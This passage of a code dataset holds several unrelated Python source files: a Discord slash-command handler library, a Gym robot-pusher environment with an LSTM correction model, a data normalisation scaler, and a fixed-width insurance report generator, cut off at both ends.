You have\", mypurse.get_balance(), \"Thanks for playing!\")\r\n else:\r\n self.take_bet()\r\n\r\n\r\ndef run_slot_machine():\r\n mySlot = Slot()\r\n\r\n\r\nrun_slot_machine()\r\n","sub_path":"p19/assy.py","file_name":"assy.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316912037","text":"import discord\r\nfrom discord.http import Route\r\nfrom discord.shard import AutoShardedClient\r\nfrom discord.ext.commands.cooldowns import Cooldown, CooldownMapping, BucketType\r\nimport asyncio\r\nfrom .interactions import Interaction, SlashCommand\r\nimport datetime\r\n\r\n\r\n#-----------------------------------+\r\n# Utils |\r\n#-----------------------------------+\r\ndef class_name(func):\r\n res = func.__qualname__[:-len(func.__name__)]\r\n return None if len(res) == 0 else res[:-1]\r\n\r\n\r\nclass PseudoCog:\r\n def __init__(self, client):\r\n '''\r\n A shitty solution for slash-commands in cogs\r\n '''\r\n self.client = client\r\n\r\n\r\nclass HANDLER:\r\n '''\r\n # Internal use only\r\n ## A global SLashCommand handler\r\n This is done in order to give an ability to\r\n decorate functions across multiple files\r\n ```\r\n from dislash import slash_commands\r\n\r\n @slash_commands.command()\r\n async def hello(interaction):\r\n await interaction.reply('Hi')\r\n ```\r\n ### Note that you should init `SlashClient` to track `interaction_create` events\r\n '''\r\n client = None\r\n commands = {}\r\n\r\n\r\nclass SlashCommandResponse:\r\n def __init__(self, client, func, name):\r\n cogname = class_name(func)\r\n if cogname is not None:\r\n self.cog = PseudoCog(client)\r\n else:\r\n self.cog = None\r\n if hasattr(func, '__slash_checks__'):\r\n self.checks = func.__slash_checks__\r\n else:\r\n self.checks = []\r\n try:\r\n cooldown = func.__slash_cooldown__\r\n except AttributeError:\r\n cooldown = None\r\n finally:\r\n self._buckets = CooldownMapping(cooldown)\r\n self.name = name\r\n self.func = func\r\n \r\n async def __call__(self, interaction):\r\n if self.cog is not None:\r\n return await self.func(self.cog, interaction)\r\n else:\r\n return await self.func(interaction)\r\n \r\n async def invoke(self, interaction):\r\n self._prepare_cooldowns(interaction)\r\n await self(interaction)\r\n\r\n def _prepare_cooldowns(self, inter):\r\n if self._buckets.valid:\r\n dt = inter.created_at\r\n current = dt.replace(tzinfo=datetime.timezone.utc).timestamp()\r\n bucket = self._buckets.get_bucket(inter, current)\r\n retry_after = bucket.update_rate_limit(current)\r\n if retry_after:\r\n raise CommandOnCooldown(bucket, retry_after)\r\n\r\n\r\n#-----------------------------------+\r\n# Exceptions |\r\n#-----------------------------------+\r\nclass SlashCommandError(discord.DiscordException):\r\n pass\r\n\r\n\r\nclass CommandOnCooldown(SlashCommandError):\r\n \"\"\"Exception raised when the slash-command being invoked is on cooldown.\r\n\r\n This inherits from `SlashCommandError`\r\n\r\n ## Attributes\r\n \r\n `cooldown`: `Cooldown` (a class with attributes `rate`, `per`, and `type`)\r\n\r\n `retry_after`: `float` (the amount of seconds to wait before you can retry again)\r\n \"\"\"\r\n def __init__(self, cooldown, retry_after):\r\n self.cooldown = cooldown\r\n self.retry_after = retry_after\r\n super().__init__('You are on cooldown. 
Try again in {:.2f}s'.format(retry_after))\r\n\r\n\r\nclass NotGuildOwner(SlashCommandError):\r\n pass\r\n\r\n\r\nclass MissingGuildPermissions(SlashCommandError):\r\n def __init__(self, perms):\r\n self.perms = perms\r\n\r\n\r\nclass MissingPermissions(SlashCommandError):\r\n def __init__(self, perms):\r\n self.perms = perms\r\n\r\n\r\nclass NotOwner(SlashCommandError):\r\n pass\r\n\r\n\r\n#-----------------------------------+\r\n# Decorators |\r\n#-----------------------------------+\r\ndef command(*args, **kwargs):\r\n '''\r\n A decorator that registers a function below as response for specified slash-command\r\n\r\n `name` - name of the slash-command you want to respond to\r\n (equals to function name by default)\r\n\r\n (defaults to `None`, in this case function responds to\r\n both global and local commands with the same names)\r\n\r\n ## Example \r\n ```\r\n @slash_commands.command(name='user-info')\r\n async def user_info(interaction):\r\n # Your code\r\n ```\r\n '''\r\n def decorator(func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = kwargs.get('name', func.__name__)\r\n # is_global = kwargs.get('global')\r\n new_func = SlashCommandResponse(HANDLER.client, func, name)\r\n HANDLER.commands[name] = new_func\r\n return new_func\r\n return decorator\r\n\r\n\r\ndef check(predicate):\r\n '''\r\n A function that converts ``predicate(interaction)`` functions\r\n into slash-command decorators\r\n\r\n Example\r\n\r\n ::\r\n\r\n def is_guild_owner():\r\n def predicate(inter):\r\n return inter.author.id == inter.guild.owner_id\r\n return check(predicate)\r\n \r\n @is_guild_owner()\r\n @slash.command()\r\n async def hello(inter):\r\n await inter.reply(\"Hello, Owner.\")\r\n \r\n \r\n .. note:: **/hello** must be registered first, see :ref:`slash-command_constructor`\r\n '''\r\n def decorator(func):\r\n if isinstance(func, SlashCommandResponse):\r\n func.checks.append(predicate)\r\n else:\r\n if not hasattr(func, '__slash_checks__'):\r\n func.__slash_checks__ = []\r\n func.__slash_checks__.append(predicate)\r\n return func\r\n return decorator\r\n\r\n\r\ndef is_guild_owner():\r\n '''\r\n A decorator. Checks if the author is the guild's owner.\r\n '''\r\n def predicate(interaction):\r\n if interaction.member.id == interaction.guild.owner_id:\r\n return True\r\n raise NotGuildOwner(\"You don't own this guild\")\r\n return check(predicate)\r\n\r\n\r\ndef is_owner():\r\n '''\r\n A decorator. Checks if the author is the bot's owner.\r\n '''\r\n def predicate(interaction):\r\n if interaction.member.id in interaction.client.owner_ids:\r\n return True\r\n raise NotOwner(\"You do not own this bot.\")\r\n return check(predicate)\r\n\r\n\r\ndef has_guild_permissions(**perms):\r\n '''\r\n A decorator. Checks if the author has specific guild permissions.\r\n '''\r\n def predicate(inter):\r\n if inter.member.id == inter.guild.owner_id:\r\n return True\r\n has = inter.member.guild_permissions\r\n if has.administrator:\r\n return True\r\n if all(getattr(has, kw, True) for kw in perms):\r\n return True\r\n raise MissingGuildPermissions([kw for kw in perms if getattr(has, kw, None) is not None])\r\n return check(predicate)\r\n\r\n\r\ndef has_permissions(**perms):\r\n '''\r\n A decorator. 
Checks if the author has specific permissions in the channel.\r\n '''\r\n invalid = set(perms) - set(discord.Permissions.VALID_FLAGS)\r\n if invalid:\r\n raise TypeError('Invalid permission(s): %s' % (', '.join(invalid)))\r\n def predicate(inter):\r\n ch = inter.channel\r\n permissions = ch.permissions_for(inter.member)\r\n missing = [perm for perm, value in perms.items() if getattr(permissions, perm) != value]\r\n if not missing:\r\n return True\r\n raise MissingPermissions(missing)\r\n return check(predicate)\r\n\r\n\r\ndef cooldown(rate, per, type=BucketType.default):\r\n '''\r\n A decorator that adds a cooldown to a slash-command. Similar to **discord.py** cooldown decorator.\r\n\r\n A cooldown allows a command to only be used a specific amount\r\n of times in a specific time frame. These cooldowns can be based\r\n either on a per-guild, per-channel, per-user, per-role or global basis.\r\n Denoted by the third argument of ``type`` which must be of enum\r\n type ``BucketType``.\r\n\r\n If a cooldown is triggered, then ``CommandOnCooldown`` is triggered in\r\n ``on_slash_command_error`` in the local error handler.\r\n\r\n A command can only have a single cooldown.\r\n\r\n Parameters\r\n ----------\r\n \r\n rate : int\r\n The number of times a command can be used before triggering a cooldown.\r\n\r\n per : float\r\n The amount of seconds to wait for a cooldown when it's been triggered.\r\n\r\n type : BucketType\r\n The type of cooldown to have.\r\n '''\r\n def decorator(func):\r\n if isinstance(func, SlashCommandResponse):\r\n func._buckets = CooldownMapping(Cooldown(rate, per, type))\r\n else:\r\n func.__slash_cooldown__ = Cooldown(rate, per, type)\r\n return func\r\n return decorator\r\n\r\n\r\n#-----------------------------------+\r\n# Slash-commands client |\r\n#-----------------------------------+\r\nclass SlashClient:\r\n '''\r\n The main purpose of this class is to track ``INTERACTION_CREATE`` event.\r\n\r\n Parameters\r\n ----------\r\n\r\n client : commands.Client or commands.Bot\r\n\r\n Attributes\r\n ----------\r\n\r\n client : commands.Client\r\n\r\n registered_global_commands : dict\r\n All registered global commands are cached here\r\n \r\n is_ready : bool\r\n Equals to ``True`` if SlashClient is ready, otherwise it's ``False``\r\n '''\r\n def __init__(self, client):\r\n HANDLER.client = client\r\n self.client = HANDLER.client\r\n self.events = {}\r\n self.registered_global_commands = []\r\n # self.registered_guild_commands = {}\r\n self.is_ready = False\r\n self.client.loop.create_task(self._do_ignition())\r\n @property\r\n def commands(self):\r\n return HANDLER.commands\r\n\r\n def event(self, func):\r\n '''\r\n Decorator\r\n ::\r\n \r\n @slash.event\r\n async def on_ready():\r\n print(\"SlashClient is ready\")\r\n \r\n | All possible events:\r\n | ``on_ready``, ``on_slash_command_error``\r\n '''\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = func.__name__\r\n if name.startswith('on_'):\r\n name = name[3:]\r\n if name in ['slash_command_error', 'ready']:\r\n self.events[name] = func\r\n return func\r\n\r\n def command(self, *args, **kwargs):\r\n '''\r\n A decorator that registers a function below as response for specified slash-command\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n name of the slash-command you want to response to (equals to function name by default)\r\n '''\r\n def decorator(func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise 
TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = kwargs.get('name', func.__name__)\r\n new_func = SlashCommandResponse(self.client, func, name)\r\n self.commands[name] = new_func\r\n return new_func\r\n return decorator\r\n \r\n # Working with slash-commands\r\n async def fetch_global_commands(self):\r\n '''Requests a list of global registered commands from the API\r\n\r\n Returns\r\n -------\r\n\r\n global_commands : List[SlashCommand]\r\n '''\r\n data = await self.client.http.request(Route('GET', '/applications/{app_id}/commands', app_id=self.client.user.id))\r\n return [SlashCommand.from_dict(dat) for dat in data]\r\n\r\n async def fetch_guild_commands(self, guild_id: int):\r\n '''Requests a list of registered commands for a specific guild\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n Returns\r\n -------\r\n\r\n guild_commands : List[SlashCommand]\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/guilds/{guild_id}/commands',\r\n app_id=self.client.user.id, guild_id=guild_id)\r\n )\r\n return [SlashCommand.from_dict(dat) for dat in data]\r\n \r\n async def fetch_global_command(self, command_id: int):\r\n '''Requests a registered global slash-command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n\r\n Returns\r\n -------\r\n\r\n global_command : SlashCommand\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id)\r\n )\r\n return SlashCommand.from_dict(data)\r\n\r\n async def fetch_guild_command(self, guild_id: int, command_id: int):\r\n '''Requests a registered guild command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n\r\n Returns\r\n -------\r\n\r\n guild_command : SlashCommand\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id)\r\n )\r\n return SlashCommand.from_dict(data)\r\n\r\n async def register_global_slash_command(self, slash_command: SlashCommand):\r\n '''Registers a global slash-command\r\n\r\n .. seealso:: :ref:`raw_slash_command`\r\n \r\n Parameters\r\n ----------\r\n\r\n slash_command : SlashCommand\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route('POST', '/applications/{app_id}/commands', app_id=self.client.user.id),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def register_guild_slash_command(self, guild_id: int, slash_command: SlashCommand):\r\n '''Registers a local slash-command\r\n \r\n .. 
seealso:: :ref:`raw_slash_command`\r\n \r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n slash_command : SlashCommand\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route(\r\n 'POST', '/applications/{app_id}/guilds/{guild_id}/commands',\r\n app_id=self.client.user.id, guild_id=guild_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def edit_global_slash_command(self, command_id: int, slash_command: SlashCommand):\r\n '''Edits a global command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n\r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n slash_command.id = command_id\r\n for i, cmd in enumerate(self.registered_global_commands):\r\n if cmd.id == command_id:\r\n self.registered_global_commands[i] = slash_command\r\n break\r\n await self.client.http.request(\r\n Route(\r\n 'PATCH', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def edit_guild_slash_command(self, guild_id: int, command_id: int, slash_command: SlashCommand):\r\n '''Edits a local command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n\r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route(\r\n 'PATCH', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def delete_global_slash_command(self, command_id: int):\r\n '''Deletes a global command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n '''\r\n for i, cmd in enumerate(self.registered_global_commands):\r\n if cmd.id == command_id:\r\n self.registered_global_commands.pop(i)\r\n break\r\n await self.client.http.request(\r\n Route(\r\n 'DELETE', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id\r\n )\r\n )\r\n \r\n async def delete_guild_slash_command(self, guild_id: int, command_id: int):\r\n '''Deletes a local command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n '''\r\n await self.client.http.request(\r\n Route(\r\n 'DELETE', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id\r\n )\r\n )\r\n\r\n # Slower methods\r\n async def fetch_global_command_named(self, name: str):\r\n '''\r\n Fetches a global command that matches the specified name\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to fetch\r\n '''\r\n for c in self.registered_global_commands:\r\n if c.name == name:\r\n return c\r\n cmds = await self.fetch_global_commands()\r\n for c in cmds:\r\n if c.name == name:\r\n self.registered_global_commands.append(c)\r\n return c\r\n\r\n async def fetch_guild_command_named(self, guild_id: int, name: str):\r\n '''\r\n Fetches a guild command that matches the specified name\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to fetch\r\n '''\r\n cmds = await 
self.fetch_guild_commands(guild_id)\r\n for cmd in cmds:\r\n if cmd.name == name:\r\n return cmd\r\n\r\n async def edit_global_command_named(self, name: str, slash_command: SlashCommand):\r\n '''\r\n Edits a global command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to edit\r\n \r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n cmd = await self.fetch_global_command_named(name)\r\n if cmd is not None:\r\n await self.edit_global_command(cmd.id, slash_command)\r\n\r\n async def edit_guild_command_named(self, guild_id: int, name: str, slash_command: SlashCommand):\r\n '''\r\n Edits a local command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to edit\r\n \r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n cmd = await self.fetch_guild_command_named(guild_id, name)\r\n if cmd is not None:\r\n await self.edit_guild_command(guild_id, cmd.id, slash_command)\r\n\r\n async def delete_global_command_named(self, name: str):\r\n '''\r\n Deletes a global command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to delete\r\n '''\r\n cmd = await self.fetch_global_command_named(name)\r\n if cmd is not None:\r\n await self.delete_global_command(cmd.id)\r\n\r\n async def delete_guild_command_named(self, guild_id: int, name: str):\r\n '''\r\n Deletes a local command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to edit\r\n '''\r\n cmd = await self.fetch_guild_command_named(guild_id, name)\r\n if cmd is not None:\r\n await self.delete_guild_command(guild_id, cmd.id)\r\n\r\n # Internal use only\r\n async def _do_ignition(self):\r\n '''# Don't use it'''\r\n if isinstance(self.client, AutoShardedClient):\r\n for _ in range(self.client.shard_count):\r\n await self.client.wait_for('shard_connect', timeout=60)\r\n for shard_data in self.client._AutoShardedClient__shards.values():\r\n shard_data.ws._discord_parsers['INTERACTION_CREATE'] = self._do_invokation\r\n else:\r\n await self.client.wait_for('connect')\r\n self.client.ws._discord_parsers['INTERACTION_CREATE'] = self._do_invokation\r\n self.is_ready = True\r\n self.client.loop.create_task(self._activate_event('ready'))\r\n self.registered_global_commands = await self.fetch_global_commands()\r\n \r\n def _do_invokation(self, payload):\r\n '''\r\n # Don't use it\r\n '''\r\n self.client.loop.create_task(self._invoke_slash_command(payload))\r\n\r\n async def _activate_event(self, event_name, *args, **kwargs):\r\n '''\r\n # Don't use it\r\n '''\r\n func = self.events.get(event_name)\r\n if func is not None:\r\n cogname = class_name(func)\r\n if cogname is not None:\r\n await func(PseudoCog(self.client), *args, **kwargs)\r\n else:\r\n await func(*args, **kwargs)\r\n\r\n async def _invoke_slash_command(self, payload):\r\n '''\r\n # Don't use it\r\n '''\r\n name = payload['data']['name']\r\n SCR = self.commands.get(name)\r\n if SCR is not None:\r\n inter = Interaction(self.client, payload)\r\n # Run checks\r\n err = None\r\n for _check in SCR.checks:\r\n try:\r\n if not _check(inter):\r\n err = SlashCommandError(f'Command <{name}> failed')\r\n break\r\n except Exception as e:\r\n err = e\r\n break\r\n # Activate error 
handler in case checks failed\r\n if err is not None:\r\n if 'slash_command_error' not in self.events:\r\n raise err\r\n await self._activate_event('slash_command_error', inter, err)\r\n return\r\n # Invoke the command\r\n try:\r\n await SCR.invoke(inter)\r\n except Exception as err:\r\n if 'slash_command_error' not in self.events:\r\n raise err\r\n await self._activate_event('slash_command_error', inter, err)\r\n \r\n # Aliases\r\n register_global_command = register_global_slash_command\r\n \r\n register_guild_command = register_guild_slash_command\r\n\r\n edit_global_command = edit_global_slash_command\r\n\r\n edit_guild_command = edit_guild_slash_command\r\n\r\n delete_global_command = delete_global_slash_command\r\n\r\n delete_guild_command = delete_guild_slash_command\r\n","sub_path":"dislash/slash_commands.py","file_name":"slash_commands.py","file_ext":"py","file_size_in_byte":23278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297508963","text":"import os\nimport time\nimport gym\nimport numpy as np\nfrom gym import spaces\nfrom tqdm import tqdm\nimport torch\nfrom neural_augmented_simulator.common.envs.pusher_envs import PusherVanillaEnv\nfrom neural_augmented_simulator.common.nas.models.networks import LstmNetRealv1\nGOAL_REACHED_DISTANCE = 0.01\nRESTART_EVERY_N_EPISODES = 1000\n\n\nclass PusherVanillaAugmentedEnv(PusherVanillaEnv):\n\n def __init__(self, headless=False, is_cuda=False):\n super(PusherVanillaAugmentedEnv, self).__init__(headless=headless)\n\n self.hidden_layers = 128\n self.lstm_layers = 3\n self.is_cuda = is_cuda\n self.model = LstmNetRealv1(\n n_input_state_sim=12,\n n_input_state_real=12,\n n_input_actions=3,\n nodes=self.hidden_layers,\n layers=self.lstm_layers)\n self.modified_obs = torch.zeros(1, 12).float()\n self.modified_actions = torch.zeros(1, 3).float()\n self.model_path = os.path.abspath('model-exp1-h128-l3-v{}-{}-{}e5.pth'.format(os.environ['variant'], os.environ['approach'],\n os.environ['noise_type']))\n print('------------------------------------------------------------')\n print('Model Path is : {}'.format(self.model_path))\n print('------------------------------------------------------------')\n\n if self.is_cuda:\n self.cuda_convert()\n self.load_model()\n # observation = 3 joints + 3 velocities + 2 puck position + 2 coordinates for target\n\n def cuda_convert(self):\n self.model = self.model.cuda()\n self.modified_obs = self.modified_obs.cuda()\n self.modified_actions = self.modified_actions.cuda()\n\n def load_model(self):\n return self.model.load_state_dict(torch.load(self.model_path)) \\\n if self.is_cuda else self.model.load_state_dict(torch.load(self.model_path, map_location='cpu'))\n\n def augment(self, last_obs, action, new_obs):\n last_obs = self.obs2lstm(last_obs)\n new_obs = self.obs2lstm(new_obs)\n self.modified_actions = action\n action = self.modified_actions.clone()\n\n input_tensor = torch.cat((last_obs, action, new_obs), 1).unsqueeze(0)\n with torch.no_grad():\n diff = self.model.forward(input_tensor)\n\n return diff.squeeze(0)\n\n def convert_to_tensor(self, numpy_array):\n return torch.FloatTensor(np.expand_dims(numpy_array, 0)).cuda() \\\n if self.is_cuda else torch.FloatTensor(np.expand_dims(numpy_array, 0))\n\n def obs2lstm(self, obs):\n self.modified_obs[:, :8] = obs[:, :8]\n return self.modified_obs.clone()\n\n def seed(self, seed=None):\n return [np.random.seed(seed)]\n\n def step(self, action):\n obs = super()._get_obs()\n new_obs, _, _, _ = 
super().step(action)\n\n obs = self.convert_to_tensor(obs)\n # print('observation is {}: '.format(obs))\n action = self.convert_to_tensor(action)\n new_obs = self.convert_to_tensor(new_obs)\n obs_diff = self.augment(obs, action, new_obs)\n corrected_obs = new_obs[:, :6] + obs_diff[:, :6]\n new_obs[:, :6] = corrected_obs\n corrected_obs = corrected_obs.cpu().numpy().squeeze(0)\n new_obs = new_obs.cpu().numpy()\n self._set_state_(corrected_obs[:6])\n\n reward, done, dist = super()._getReward()\n\n return new_obs, reward, done, {\"distance\": dist}\n\n def reset(self, forced=False):\n self.model.zero_hidden() # !important\n self.model.hidden = (self.model.hidden[0].detach(),\n self.model.hidden[1].detach())\n return super().reset()\n\n\nif __name__ == '__main__':\n import gym\n import gym_ergojr\n import time\n\n env = gym.make(\"ErgoPusherAugmented-Graphical-v1\")\n MODE = \"manual\"\n r = range(100)\n\n # env = gym.make(\"ErgoPusher-Headless-v1\")\n # MODE = \"timings\"\n # r = tqdm(range(10000))\n\n env.reset()\n\n timings = []\n ep_count = 0\n\n start = time.time()\n\n for _ in r:\n while True:\n action = env.action_space.sample()\n obs, rew, done, misc = env.step(action)\n\n if MODE == \"manual\":\n # print(\"act {}, obs {}, rew {}, done {}\".format(\n # action, obs, rew, done))\n\n time.sleep(0.01)\n\n if MODE == \"timings\":\n ep_count += 1\n if ep_count >= 10000:\n diff = time.time() - start\n tqdm.write(\"avg. fps: {}\".format(\n np.around(10000 / diff, 3)))\n np.savez(\"timings.npz\", time=np.around(10000 / diff, 3))\n ep_count = 0\n start = time.time()\n\n if done:\n env.reset()\n break\n","sub_path":"neural_augmented_simulator/common/envs/pusher_augmented.py","file_name":"pusher_augmented.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496725487","text":"from enum import Enum\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.preprocessing\n\nfrom .util.dtype import toFloatArray\n\n\nclass NormalisationMode(Enum):\n NONE = \"none\"\n MAX_ALL = \"max_all\"\n MAX_BY_COLUMN = \"max_by_column\"\n STANDARDISED = \"standardised\"\n\n\nclass VectorDataScaler:\n def __init__(self, dataFrame: pd.DataFrame, normalisationMode: NormalisationMode):\n self.normalisationMode = normalisationMode\n self.scale, self.translate = self._computeScalingParams(dataFrame.values, normalisationMode)\n self.dimensionNames = list(dataFrame.columns)\n\n @staticmethod\n def _computeScalingParams(rawArray: np.ndarray, normalisationMode: NormalisationMode):\n \"\"\"\n :param rawArray: numpy array containing raw data\n :param normalisationMode: the normalization mode (0=none, 1=by maximum in entire data set, 2=by separate maximum in each column)\n \"\"\"\n if len(rawArray.shape) != 2:\n raise ValueError(\"Only 2D arrays are supported\")\n dim = rawArray.shape[1]\n translate = None\n if normalisationMode == NormalisationMode.NONE:\n scale = None\n elif normalisationMode == NormalisationMode.MAX_ALL:\n scale = np.ones(dim) * np.max(rawArray)\n elif normalisationMode == NormalisationMode.MAX_BY_COLUMN:\n scale = np.ones(dim)\n for i in range(dim):\n scale[i] = np.max(np.abs(rawArray[:, i]))\n elif normalisationMode == NormalisationMode.STANDARDISED:\n standardScaler = sklearn.preprocessing.StandardScaler()\n standardScaler.fit(rawArray)\n translate = standardScaler.mean_\n scale = standardScaler.scale_\n else:\n raise Exception(\"Unknown normalization mode\")\n return scale, 
translate\n\n @staticmethod\n def _array(data: Union[pd.DataFrame, np.ndarray]):\n return toFloatArray(data)\n\n\n def getNormalisedArray(self, data: Union[pd.DataFrame, np.ndarray]) -> np.ndarray:\n result = self._array(data)\n if self.translate is not None:\n result = result - self.translate\n if self.scale is not None:\n result = result / self.scale\n return result\n\n def getDenormalisedArray(self, data: Union[pd.DataFrame, np.ndarray]) -> np.ndarray:\n result = self._array(data)\n if self.scale is not None:\n result = result * self.scale\n if self.translate is not None:\n result = result + self.translate\n return result\n","sub_path":"src/sensai/normalisation.py","file_name":"normalisation.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"274295492","text":"import os\nimport pandas as pd\nimport re\n\nPATH = os.path.abspath('.')\nDATA_DIR = os.path.join(PATH, 'data')\nFILENAME = 'seguros_59_final.csv'\nCOD_COOP = '5024'\nCOD_PROD = '59'\nNOME_PROD = 'SEGUROS'\nDATA_ARQUIVO = '20210330'\nTIPO_INFO = '41'\nANO_REF = '2020'\n\ndef adjust_str_size(s, size, type):\n s = str(s)\n if len(s) > size:\n return s[:size]\n elif len(s) < size:\n if type == 'n':\n qtt = size - len(s)\n return qtt * '0' + s\n if type == 'a':\n qtt = size - len(s)\n return s + qtt * ' '\n return s\n\ndef read_and_convert_to_str(file):\n df = pd.read_csv(os.path.join(DATA_DIR, file), sep=';', encoding='utf-8', decimal=',')\n for col in df.columns:\n if df[col].dtype == 'float64':\n df[col] = df[col].astype('str')\n df[col] = df[col].apply(lambda x: re.sub('[^\\sA-Za-z0-9]+', '', x))\n df[col] = df[col].apply(lambda x: x + '0' if len(x) < 3 else x)\n df[col] = df[col].astype('str')\n df[col] = df[col].apply(lambda x: re.sub('[^\\sA-Za-z0-9]+', '', x)) \n return df\n\ndef generate_header(cod_coop, cod_prod, desc_prod, data_arquivo, seq):\n return '0' + str(cod_coop) + str(cod_prod) + adjust_str_size(desc_prod, 30, 'a') + str(data_arquivo) + (388 * ' ') \\\n + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ndef generate_trailler(qtt_reg, seq):\n return '9' + adjust_str_size(qtt_reg, 6, 'n') + (426 * ' ') + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ndef generate_detalhe(id_negocio, n_cliente, cpf_cnpj, nome_cliente, cod_prod, cod_mod_prod, tipo_info, ano, val_jan, val_fev,\n val_mar, val_abr, val_mai, val_jun, val_jul, val_ago, val_set, val_out, val_nov, val_dez, n_matricula,\n seq):\n \n return '1' + adjust_str_size(id_negocio, 50, 'a') + adjust_str_size(n_cliente, 7, 'n') + adjust_str_size(cpf_cnpj, 14, 'n') \\\n + adjust_str_size(nome_cliente, 40, 'a') + str(cod_prod) + adjust_str_size(cod_mod_prod, 3, 'n') + adjust_str_size(tipo_info, 5, 'n') \\\n + str(ano) + adjust_str_size(val_jan, 17, 'n') + adjust_str_size(val_fev, 17, 'n') + adjust_str_size(val_mar, 17, 'n') \\\n + adjust_str_size(val_abr, 17, 'n') + adjust_str_size(val_mai, 17, 'n') + adjust_str_size(val_jun, 17, 'n') \\\n + adjust_str_size(val_jul, 17, 'n') + adjust_str_size(val_ago, 17, 'n') + adjust_str_size(val_set, 17, 'n') \\\n + adjust_str_size(val_out, 17, 'n') + adjust_str_size(val_nov, 17, 'n') + adjust_str_size(val_dez, 17, 'n') \\\n + adjust_str_size(n_matricula, 10, 'n') + (93 * ' ') + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ninf_f = read_and_convert_to_str(FILENAME)\ncounter = 2\nf_name = COD_COOP + '_' + COD_PROD + '_' + adjust_str_size(inf_f.iloc[1, 1], 2, 'n') + '_INFACUM_' + DATA_ARQUIVO[4:6] + DATA_ARQUIVO[:4] + '.txt'\n\nwith open(f_name, 'a') as 
